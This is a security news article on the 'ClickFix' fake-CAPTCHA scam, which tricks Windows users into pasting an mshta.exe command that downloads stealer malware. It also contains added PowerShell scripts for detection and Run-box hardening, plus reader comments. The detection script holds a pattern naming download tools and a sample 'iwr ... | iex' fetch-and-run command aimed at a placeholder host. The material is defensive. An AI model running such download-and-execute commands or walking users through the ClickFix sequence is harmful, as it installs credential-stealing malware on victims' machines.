March 14, 2025

A clever malware deployment scheme first spotted in targeted attacks last year has now gone mainstream. In this scam, dubbed “ClickFix,” the visitor to a hacked or malicious website is asked to prove they are not a bot by pressing a short sequence of keyboard shortcuts. Followed to the letter, that sequence makes Microsoft Windows fetch and run password-stealing malware, with the victim doing the typing.

ClickFix attacks mimic the “Verify You are a Human” tests that many websites use to separate real visitors from content-scraping bots. This particular scam usually starts with a website popup that looks something like this:

This malware attack pretends to be a CAPTCHA intended to separate humans from bots.

Clicking the “I’m not a robot” button generates a pop-up message asking the user to take three sequential steps to prove their humanity.

Executing this series of keypresses prompts Windows to download password-stealing malware.

Step 1 involves simultaneously pressing the key bearing the Windows logo and the letter “R,” which opens the Windows “Run” dialog. Run will execute whatever command is typed or pasted into it, including built-in system tools such as mshta.exe.

Step 2 asks the user to press the “CTRL” key and the letter “V” at the same time, which pastes a malicious command into the Run dialog. That command did not come from the user: the site’s JavaScript wrote it to the user’s clipboard when the user clicked the “I’m not a robot” button, since that click supplies the user interaction browsers require before a page may write to the clipboard.

Step 3, pressing the “Enter” key, runs the pasted command. It invokes “mshta.exe,” a legitimate, Microsoft-signed Windows program designed to run Microsoft HTML Application (.hta) files, and points it at a remote URL, so Windows downloads and executes the attacker’s code with the user’s own privileges.

“This campaign delivers multiple families of commodity malware, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT,” Microsoft wrote in a blog post on Thursday. “Depending on the specific payload, the specific code launched through mshta.exe varies. Some samples have downloaded PowerShell, JavaScript, and portable executable (PE) content.”
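The mshta.exe invocation described above leaves two artifacts a responder can check. The following PowerShell is an added example, not code from the KrebsOnSecurity post or from Microsoft’s report: it flags Run-box history (the RunMRU registry key, where Explorer records what was submitted to the Run dialog) and Security event 4688 process creations in which explorer.exe launched mshta.exe, PowerShell or a similar built-in tool with a URL on the command line. The regex, the function names and the sample command lines are constructed for this example, and the 4688 query only returns results where process-creation auditing with command-line logging is enabled.

```powershell
# Added example (not from the post or Microsoft's report): hunt for ClickFix traces
# on a Windows host. Two artifacts are checked:
#   1. HKCU\...\Explorer\RunMRU, where Explorer records what was submitted to the Run box
#   2. Security event 4688 (process creation), for mshta.exe / powershell.exe and similar
#      tools launched by explorer.exe with a URL or UNC path on the command line
# The pattern below is a starting point for this example; tune it for your environment.

$ClickFixPattern = '(?i)\b(mshta|powershell|pwsh|cmd|curl|bitsadmin|certutil)(\.exe)?\b.*(https?://|\\\\)'

function Test-ClickFixCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    return [bool]($CommandLine -match $ClickFixPattern)
}

function Get-SuspiciousRunMru {
    # RunMRU values are named a, b, c ...; "MRUList" gives their order.
    # Each value is stored as "<command>\1" (Explorer appends "\1").
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return @() }
    $props = Get-ItemProperty -Path $key
    $props.PSObject.Properties |
        Where-Object { $_.Name -match '^[a-z]$' } |
        ForEach-Object {
            $cmd = ($_.Value -replace '\\1$', '')
            if ($cmd -and (Test-ClickFixCommand $cmd)) {
                [pscustomobject]@{ Source = 'RunMRU'; Entry = $_.Name; CommandLine = $cmd }
            }
        }
}

function Get-SuspiciousProcessCreation {
    param([int]$Hours = 24)
    # Needs "Audit Process Creation" and "Include command line in process creation events".
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $parent = $data['ParentProcessName']
        $cmd    = $data['CommandLine']
        # ClickFix runs from the Run box, so the parent is the user's Explorer shell.
        if ($parent -like '*\explorer.exe' -and $cmd -and (Test-ClickFixCommand $cmd)) {
            [pscustomobject]@{ Source = '4688'; Time = $_.TimeCreated; Parent = $parent; CommandLine = $cmd }
        }
    }
}

# Constructed sample Run-box inputs (not real campaign indicators). Expected: True, True, False, False.
$samples = @(
    'mshta https://example.invalid/verify/captcha.mp4',
    'powershell -w hidden -c "iwr https://example.invalid/x | iex"',
    'notepad.exe',
    'mailto:someone@example.invalid'
)
foreach ($s in $samples) { '{0,-6} {1}' -f (Test-ClickFixCommand $s), $s }

Get-SuspiciousRunMru
Get-SuspiciousProcessCreation -Hours 72
```

RunMRU is per user and only records what went through the Run dialog, so an empty result does not clear the host; the 4688 check (or the equivalent Sysmon event 1 with ParentImage ending in explorer.exe) is the one that catches the same command pasted into a Command Prompt or PowerShell window instead.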

According to Microsoft, hospitality workers are being tricked into downloading credential-stealing malware by cybercriminals impersonating Booking.com. The company said attackers have been sending malicious emails impersonating Booking.com, often referencing negative guest reviews, requests from prospective guests, or online promotion opportunities — all in a bid to convince people to step through one of these ClickFix attacks.

In November 2024, KrebsOnSecurity reported that hundreds of hotels that use booking.com had been subject to targeted phishing attacks. Some of those lures worked, and allowed thieves to gain control over booking.com accounts. From there, they sent out phishing messages asking for financial information from people who’d just booked travel through the company’s app.

Earlier this month, the security firm Arctic Wolf warned about ClickFix attacks targeting people working in the healthcare sector. The company said those attacks leveraged malicious code stitched into the widely used physical therapy video site HEP2go that redirected visitors to a ClickFix prompt.

An alert (PDF) released in October 2024 by the U.S. Department of Health and Human Services warned that the ClickFix attack can take many forms, including fake Google Chrome error pages and popups that spoof Facebook.

ClickFix tactic used by malicious websites impersonating Google Chrome, Facebook, PDFSimpli, and reCAPTCHA. Source: Sekoia.

The ClickFix attack, and its reliance on mshta.exe, is reminiscent of phishing techniques employed for years that hid malicious code inside Microsoft Office macros. Malicious macros became such a common malware delivery vehicle that Microsoft was forced to start blocking macros by default in Office documents downloaded from the internet. ClickFix sidesteps that control: nothing lands on disk until the victim has already run the command, and the download is performed by a signed Windows binary rather than by Office.

Alas, the email security vendor Proofpoint has documented plenty of ClickFix attacks via phishing emails that include HTML attachments spoofing Microsoft Office files. When opened, the attachment displays an image of a Microsoft Word document with a pop-up error message directing users to click the “Solution” or “How to Fix” button.

HTML files containing ClickFix instructions. Examples for attachments named “Report_” (on the left) and “scan_doc_” (on the right). Image: Proofpoint.

Organizations that wish to do so can use the Group Policy setting “Remove Run menu from Start Menu” (User Configuration > Administrative Templates > Start Menu and Taskbar) to keep Windows from opening the Run dialog when users press the Windows key and the “R” key simultaneously. This blunts the exact sequence shown above but not the underlying trick: a lure can just as easily tell the victim to paste the same command into a Command Prompt or PowerShell window, so the policy is best paired with application-control rules for mshta.exe and with the simple rule that no legitimate CAPTCHA ever asks you to paste something into Windows.
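The Group Policy setting above is backed by a single registry value, which makes it easy to test on one machine before rolling it out. The following PowerShell is an added example, not the post’s or Microsoft’s own code: it sets and checks the NoRun policy value for the current user, the same value the Group Policy editor writes. The function names are chosen for this example; in production the setting should be deployed through Group Policy rather than by editing the registry by hand.

```powershell
# Added example (not from the post): apply the "Remove Run menu from Start Menu" policy
# for the current user by writing the registry value Group Policy itself sets.
# GPO path: User Configuration > Administrative Templates > Start Menu and Taskbar >
#           "Remove Run menu from Start Menu"
# Effect:   Win+R no longer opens the Run box. It does NOT stop cmd.exe, PowerShell or
#           mshta.exe launched any other way, so pair it with application control
#           (AppLocker / WDAC) for mshta.exe where the environment allows.

$PolicyKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'

function Set-RunBoxPolicy {
    param([ValidateSet('Enable', 'Disable')][string]$State = 'Disable')
    if (-not (Test-Path $PolicyKey)) { New-Item -Path $PolicyKey -Force | Out-Null }
    if ($State -eq 'Disable') {
        # NoRun = 1 removes the Run dialog; this is what the GPO writes when enabled.
        New-ItemProperty -Path $PolicyKey -Name NoRun -Value 1 -PropertyType DWord -Force | Out-Null
    } else {
        Remove-ItemProperty -Path $PolicyKey -Name NoRun -ErrorAction SilentlyContinue
    }
    # Explorer reads the policy when it starts; restart the shell so the change applies now.
    # Windows normally relaunches explorer.exe on its own; if not, start it manually.
    Stop-Process -Name explorer -Force
}

function Get-RunBoxPolicy {
    $v = (Get-ItemProperty -Path $PolicyKey -Name NoRun -ErrorAction SilentlyContinue).NoRun
    if ($v -eq 1) { 'Run box disabled (NoRun=1)' } else { 'Run box enabled' }
}

Set-RunBoxPolicy -State Disable
Get-RunBoxPolicy        # expected: Run box disabled (NoRun=1)
```

Because the value lives under HKCU, a user who can edit their own registry can undo it; Group Policy re-applies it on refresh, which is one more reason to deploy it centrally rather than per machine.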


52 thoughts on “ClickFix: How to Infect Your PC in Three Easy Steps”

  1. Harry Johnston

    I know every change breaks someone’s workflow, but I don’t see any compelling reason why the Run menu needs to accept pasted text.

    Reply
    1. Mister Hedgeman

      Oooh boy you would break my life if you removed paste from Run. I live in the Run window. Sometimes I use it to very quickly and efficiently remove formatting from copied text (win+r -> ctrl+v-> ctrl+a -> ctrl+x -> esc). Sometimes i use it to open copied links quickly (they open in the default browser). Sometimes I use it to compose an email to a copied email address (win+r -> type “mailto:” -> ctrl+v). The list goes on.

      Reply
      1. R.Cake

        well, it would be kinda nice if it were possible to restrict copy-paste to purely local operation. Apparently in the attack, the clipboard has been filled remotely. I am wondering if there is any legitimate use for that?

        Reply
        1. BigP

          It’s most commonly used for copying/pasting “shareURLs” to a specific page, but there are other uses. It’s mainly a convenience as it’s one click as opposed to click, drag, ctrl-c. You used to be able to read the clipboard from browsers, too… they shut that down after crypto became a thing as scripts would try to steal passphrases.

          Reply
    3. Michael

      That would be a big pain to not accept pasted text. But what would be good is for Microsoft to add a Registry Key or a Policy that would allow one to disable the ability. What would really be good is if Microsoft simply created a clipboard control panel that allowed one to set stuff like that as well as allow application specific paste options like stripping out formatting. But given a lot of Windows issues, one wonders if everyone at Microsoft on Windows development is a Mac user.

      Reply
    1. Clausewitz4.0

      “as bad guys can also screen their latest malware there”

      No, bad/good guys DO NOT screen their malware on VT. They have their own private VT which does not share samples with researchers and others.

      Reply
  2. EDV

    Thank you Brian, perfect timing. Doing an anti-fraud presentation at a church on Sunday and will provide this info., to include your website.

    Reply
  3. Nobby Nobbs

    I disable the Windows key, because the damn thing kept interrupting my games.
    Also, I make it a rule never to use the browser that came with the operating system. No matter their assurances, it’s bound to get privileges a browser shouldn’t have.

    Reply
    1. Brett Kelford

      if I own a computer I ought to be able to run things on it easily so I want win r. how did websites get access to put things on my clipboard, thus being one step closer to owning my machine?

      Reply
      1. Johan

        That’s actually what the first button click is for: it’s the required user interaction before a website may write something to your clipboard.

        But to answer your question:
        According to the compatibility table at https://developer.mozilla.org/en-US/docs/Web/API/Clipboard_API, websites have been able to write text to the clipboard on click since 2018.
        But IIRC that feature was introduced to mimic identical functionality in Adobe Flash Player, so the real answer is: a really long time

        Reply
      2. Lena Thompson

        Hackers usually always gain access through social engineering, then the fun stuff begins.

        Victim gets phishing email. They fall for the scam and click on some link in that email. This downloads the C2 malware, to be activated by the next 3 steps.

        Victim runs the 3 commands as instructed.

        Voila!
        C2 access.

        Reply
        1. mealy

          sfgate.com/tech/article/sf-tech-company-spy-hid-in-bathroom-rival-alleges-20226709.php
          And other fun stuff.

          Reply
    2. Pierpaolo Tommasi

      Clipboard access is not something only Edge has, so it’s nothing that’s solved by “not using the browser that came with the operating system”…
      But out of curiosity, which browser do you use?

      Reply
  4. Gary Reno

    Very use-full. Info like this makes it worth putting up with your politics.

    Reply
    1. mealy

      Useful is one word. I can understand why you’ve never used it.

      Reply
    2. J

      And it only has one “el”: useful.

      Knowing it’s possible you’re a Russian troll, I just want to take a perfunctory jab: Russia legalized spousal abuse in 2017 because they claimed battered women were breaking up families with laws against abuse; plus, Russia is currently imprisoning Jehovah’s Witness members (some for 12 to 18 years). Their government is dominated by lower-human drives, emphasizing chimp-like brute force over reason — you know, like some other governments.

      Russia changed spousal abuse from a felony to a misdemeanor in 2017, making it like a parking ticket with a tiny fine for the first year and escalating fines. And so much for Russia being “Christian,” because if you’re religious there but not with the Russian Orthodox church, you’re going to have a bad time if you’re public about your religion.

      Reply
    1. Captain Jazzhands

      As far as I know, the shortest way to get from zero to shell prompt on a default Mac is: Command-Spacebar, T, E, Enter. The first one opens Spotlight, T and E are the first two characters of Terminal.app. After that the paste command (Command-V in this case) followed by Enter works the same.

      It is visually different, though; Windows-R brings up the Run dialog, whereas what I described above launches the Terminal, so it’s a bit more apparent that you’re now using a different application.

      Reply
  5. DelilahTheSober

    I once received an email with some subject line that told me it was from Microsoft and urgent to read and then the message in the email was well written with grownup words and correct grammar. The message in the email told me to “click on this link to fix the problem.” DUH.

    The link I clicked on instantly downloaded and installed a virus that destroyed the contents of my hard drive. As a computer professional with advanced skills and education, I felt like a moron afterward. I’ll never forget my father shaking his head and repeatedly telling me “You? I cannot believe that someone like you would have done this!” I ended up having to pay a colleague with a better tech background than me to restore my hard drive and operating system.

    Reply
    1. Michael K

      Bad actors only need to succeed once. Mistakes happen to all of us at some point or another, glad you were able to recover your data.

      Reply
  6. Paul Easterburg

    Brian, we believe that an employee was presented with this via a vendor site. it appears the vendor site was modified due to an outdated WordPress plugin/vulnerability. There seems to be a lot of this exploit currently on SMB sites built on WordPress.

    Reply
    1. mealy

      They will have OSx/Linux versions when you reach market parity in a few centuries.

      Reply
  7. Hans Eoff

    I used OpenBSD for all my servers and SuSE Linux for my workstations almost exclusively.

    On my OpenBSD machines, I set /tmp up with a ram disk. OpenBSD itself really doesn’t use much memory so there is plenty available for other things.

    The other day, I tried an experiment. I created a test account for myself on one minor server. For this discussion, assume that the username is hans. I then created a hans directory in /tmp, changed the permission, and then copied all the files from the account I set up to the /tmp/hans directory:
    mkdir /tmp/hans
    cp -R /home/hans/* /tmp/hans
    chown -R hans:hans /tmp/hans
    chmod 700 /tmp/hans

    I also set these same commands into /etc/rc.conf.local so that whenever the system reboots, it sets it all back up again.

    And voila, I have an account that is “reset to factory defaults” every time the computer restarts. It’s not an important server (a backup DHCP server) so I can restart it whenever I wish. Or I could just rm -fR /tmp/hans and then do the steps above again.

    To be honest, it doesn’t really affect me much. It’s not bad for writing code. I just check out the code with subversion and rebuild it. And it’s no problem to set up crontab to use rsync to copy everything to a regular drive every little while so I wouldn’t lose too much if there was a power glitch.

    I don’t know that this buys me anything, but it does ensure that anything malicious disappears when rebooted.

    When I get a chance, I’ll try this out on my SuSE Linux workstation, too.

    Reply
    1. nemo

      By all means, try everything, that’s how you learn. But everything you have achieved here is a backup of your home in /tmp, which you don’t seem to use, and lose on a reboot or poweroff. I can’t see how that helps you with anything. The only thing in that setup preventing you from the exploit being subject here is that you’re using Linux. You should take some time to read of virtual machines, immutable filesystems, filesystem overlays, snapshots, usb live systems and all the things already existing which *can* do what you *seem* to want to do, only much much better. For starters, you may want to look at live Linuxes like Puppy Linux or Knoppix.

      Reply
      1. Hans Eoff

        I have a number of servers for various things. I just tried that as a whim. I’m not sure that I’ll ever need it for anything.

        Immutable Filesystems: My laptop is running Fedora Silverblue. It doesn’t get used a whole lot, though.

        Also, I used to regularly set the system immutable bits on most file system files on my OpenBSD servers. The only problem was that to apply patches and upgrades, I would first have to drop it down to single user mode to clear the system immutable bits.

        I have also used the Qubes OS in the past and have done a limited amount of virtual machines. And I have booted from CDs, DVDs, and USB devices on occasion. Over the years, I’ve tried something like ten or fifteen different LINUXes, but SuSE Linux has remained my favorite Linux. I’ve also used OpenBSD on my workstation and didn’t use Linux at all.

        I’ve also used FreeBSD, NetBSD, and Solaris.

        I tried putting a user on /tmp on nothing more than a whim during a brief break in a coding binge. I can see one possible advantage, though: unless something has changed, the solid state drives tend to be far more limited in the number of writes than are the conventional hard drives. To help extend the lives of my solid state drives, I rely on ram drives. If I can put some of my heaviest applications on a ramdisk, that could possibly extend the solid state disk life by large multiples. For the most part, though, it is sufficient to just store individual files on the /tmp ram drive.

        Reply
        1. mealy

          It takes an awful lot of writes to expend a newer SSD completely. I wouldn’t worry too much.

          Reply
          1. Billy Jack

            Yeah, but if you have a very heavily used database with lots of write, you might do it in a year or so.

            Reply
              1. Billy Jack

                Almost everything I do is on one server or another. In fact, I’m posting this from a server.

                Reply
  8. harpy

    I don’t understand the sentiment around removing copy paste functionality. If not the run box, they’ll use cmd, powershell, whatever. Education is key.

    Reply
    1. Pierpaolo Tommasi

      next step would be to remove internet functionality from the computers, because it’s used for malware

      Reply
  9. samak

    I assume this scam would fail if the user was using an account without admin rights and therefore unable to run the program. Could anyone confirm ? Thanks.

    Reply
    1. BrianKrebs Post author

      The malware fetched by completing the captcha will run in the context of the user; it doesn’t matter whether the user is admin or not because it can still snarf that user’s credentials.

      Reply
  10. David Wishengrad

    Speaking of hacks, the oldest one I know of was patched but never fixed, many years ago. I don’t care how secure and encrypted a computer is. With physical access to remove shielding and a static shock or two, almost any computer can be immediately jumped into a random place with access.

    Reply
  11. P

    My first thought was “come on! who would fall for that??”
    But then my mind ran through all the IT uneducated people I met in my IT career of over 40 years and found lots of people that would…

    Reply
  12. Drew

    It’s an abomination ANY website can read from or write to your clipboard.

    I don’t understand how the JavaScript folks or web browser vendors didn’t see that as a trap ripe to set!

    Was it somehow shoved into an RFC by committee?

    Reply
  13. Mike

    Thanks Brian, very informative article. I don’t sign in with admin rights. Is there anything that can be done to prevent the malicious pgm from being run?

    Reply
